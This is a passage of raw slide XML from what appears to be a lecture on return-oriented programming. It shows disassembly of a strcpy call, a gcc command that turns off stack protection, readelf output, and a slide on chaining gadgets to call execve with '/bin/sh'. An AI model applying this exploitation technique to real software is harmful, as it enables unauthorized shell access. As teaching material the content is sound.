                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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0xc(</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add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0x4,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,0x4(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="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lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</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ebp</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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0xa,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">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leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322202" y="5326464"/>
            <a:ext cx="7662440" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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-static -O0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector -m32 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-boundary=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rwxrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>--- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 716K Mar 22 22:43 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</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10334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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need to find gadgets in the binary that will perform different actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Essentially encode our shellcode into these gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What do we need to call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (just as we did with shellcode)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0xb in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; of "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; [&amp; of "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", NULL] in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NULL in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where to put "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>171</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50698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10" y="63610"/>
            <a:ext cx="8961120" cy="6657867"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lv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readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>starting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xa20f8:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Headers</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Nr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   ES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Flg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Lk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Inf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Al</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[ 0]                   NULL            00000000 000000 000000 00      0   0  0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[ 1] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>note.ABI-tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     NOTE            080480f4 0000f4 000020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[ 2] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>note.gnu.build-i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> NOTE            08048114 000114 000024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[ 3] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
